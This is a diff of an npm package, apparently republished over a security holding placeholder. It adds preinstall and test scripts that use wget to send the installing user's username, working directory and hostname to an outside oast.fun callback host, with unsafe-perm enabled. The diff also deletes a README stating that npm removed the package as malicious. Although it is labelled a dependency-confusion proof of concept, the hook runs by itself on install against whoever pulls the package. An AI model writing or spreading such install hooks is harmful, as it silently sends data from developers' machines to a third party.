"description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "wget --quiet \"http://nhootcihoynpykhwhmbhktqgvl82bw8qt.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
|
8
|
+
"preinstall": "wget --quiet \"http://nhootcihoynpykhwhmbhktqgvl82bw8qt.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"test",
|
12
|
+
"PoC"
|
13
|
+
],
|
14
|
+
"dependencies": {},
|
15
|
+
"config": {
|
16
|
+
"unsafe-perm":true
|
17
|
+
},
|
18
|
+
"author": "WayCup",
|
19
|
+
"license": "ISC"
|
6
20
|
}
|
21
|
+
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=financialforce for more information.
|